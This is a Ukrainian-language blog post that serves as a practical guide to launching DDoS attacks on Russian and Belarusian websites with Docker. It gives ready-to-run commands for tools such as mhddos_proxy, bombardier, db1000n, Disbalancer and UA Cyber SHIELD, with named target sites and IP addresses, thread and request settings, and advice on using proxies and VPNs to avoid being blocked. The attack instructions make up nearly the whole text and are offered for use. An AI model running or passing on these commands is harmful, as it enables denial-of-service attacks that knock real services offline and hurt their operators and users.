DDoS за допомогою Docker
Підписуйтеся на Telegram-канал «DOU #tech», щоб не пропустити нові технічні статті.
Привіт усім. У цій публікації пропоную розглянути найпопулярніші DDoS Docker-контейнери та команди для них.
Що таке DDoS атака
Це напад на комп’ютерну систему з наміром зробити комп’ютерні ресурси недоступними користувачам.
Для чого потрібен DDoS:
- Непрацюючий російський чи білоруський сайт — це упущена вигода, неотримана послуга, неможливість заробляти на рекламі, додаткові витрати на спеціалістів, софт і обладнання.
- Для початківців — це чудова можливість зрозуміти основи роботи з популярними ПЗ та технологіями, такими як Git, Docker, VPN, Proxy, Python та Bash-скриптинг. Загугліть невідомі слова.
Що таке Docker
Docker — один з найвідоміших інструментів роботи з контейнерами. Контейнери — хороша альтернатива апаратній віртуалізації. Вони дозволяють дуже легко та швидко запускати програми в ізольованому оточенні та споживають набагато менше ресурсів.
Як запускати Docker
Є декілька способів запуску Docker-контейнера. На персональному комп’ютері, у хостинг провайдера (Azure, AWS, DO надають безкоштовні пробні періоди), або за допомогою Play with Docker (контейнери працюють лише 3 години).
Корисно знати
Якщо запускаєте Docker локально, обов’язково використовуйте VPN. Краще атакувати разом (див.IT ARMY of Ukraine, кібер-козаки, ddos котики та інше).
Перед атакою перевірьте доступність атакованного сайту за допомогою port.ping.pe
Атакуйте з країни, з якої сайт ще доступний
MHDDoS_proxy
mhddos_proxy — cкрипт-обгортка для запуску потужного DDoS-інструмента MHDDoS.
Не потребує VPN — скачує і підбирає робочі проксі для атаки. Атака декількох цілей з автоматичним балансуванням навантаження. Використовує різноманітні методи для атаки.
docker run -it —rm —pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c goals.ddosukraine.com.ua/...haydamaky/targets_tcp.txt -t 1000 -p 4000 —rpc 2000 —table
docker run -it —rm —pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy -t 3000 ria.ru https://tass.ru
docker run -it —rm —pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest mercury.vetrf.ru -t 2000 -p 1200 —rpc 2000 —http-methods STRESS —debug
Можна вказувати одночасно декілька цілей (сайтів) через пробіл:
- t XXXX кількість потоків (одночасних запитів), за замовчуванням — CPU * 1000.
- table статистика у вигляді таблиці.
- debug статистика у вигляді таблиці.
- p — період, як часто оновлювати проксі. За замовчуванням 900 секунд, тобто кожні 15 хвилин. Це значення є оптимальним. Якщо хочете, можете його змінювати.
- rpc скільки запитів відправляти, враховуючи одне проксі. За замовчуванням 2000. Це значення є оптимальним. Якщо хочете, можете його змінювати.
bombardier
bombardier — простий та гнучкий інструмент, що призначений для атаки однієї цілі. Він не має встроєного проксі чи VPN.
docker run -ti —rm alpine/bombardier -c 1000 -d 1200s 185.170.2.62:443
docker run -ti —rm alpine/bombardier -c 10000 -d 60s -l mts.kub-24.ru
docker run -ti alpine/bombardier -c 120 -d 60s -l 92.223.100.53:53/UDP
- c — кількість одночасних з’єднань (те саме, що потоки);
- d — тривалість атаки в секундах;
- r — ліміт швидкості запитів на секунду;
- t — таймаут запитів/ час на один запит;
- l — статистика затримок.
db1000n
db1000n або dead by 1000 needs. Це простий клієнт генерації розподіленого навантаження, написаний на Go. Список цілей оновлюється автоматично.
Увага! Цей скрипт не має влаштованого проксі чи VPN. Без їх використання не запускайте контейнер. Якщо ви використовуєте хостинг, провайдер може заблокувати ваш акаунт. Якщо запускати з ПК, така атака не буде мати ефективності.
Інструкція з налаштування.
docker run —pull always ghcr.io/arriven/db1000n:latest
Disbalancer програма атакує російські вебресурси, які поширюють пропаганду та дезінформацію щодо повномасштабної війни росії проти українського народу.
Увага! Цей скрипт не має влаштованого проксі чи VPN. Без їх використання не запускайте контейнер. Якщо ви використовуєте хостинг, провайдер може заблокувати ваш акаунт.
1. docker pull disbalancer/liberator:latest
2. docker run disbalancer/liberator:latest
UA Cyber SHIELD — програма, що атакує російські сайти та великою кількістю запитів виводbть їх з ладу. Волонтери UA Cyber SHIELD займаються моніторингом цілей, підтримкою технічної інфраструктури, координацією атак, передачею даних до програм клієнтів тощо. Тому на момент атаки всі підготовчі дані є. Вам залишається тільки встановити програму і приєднатися. Цілі змінюються автоматично і підвантажуються з центру координації.
Програма не має жодного інтерфейсу і працює в фоновому режимі. Ви можете побачити роботу контейнера, використавши команду docker ps.
docker run -d ghcr.io/opengs/uashield:master 512 true
512 — кількість потоків
true | false чи ви бажаєте використовувати проксі. Обов’язково використовуйте проксі.
13 коментарів
Додати коментар Підписатись на коментаріВідписатись від коментарів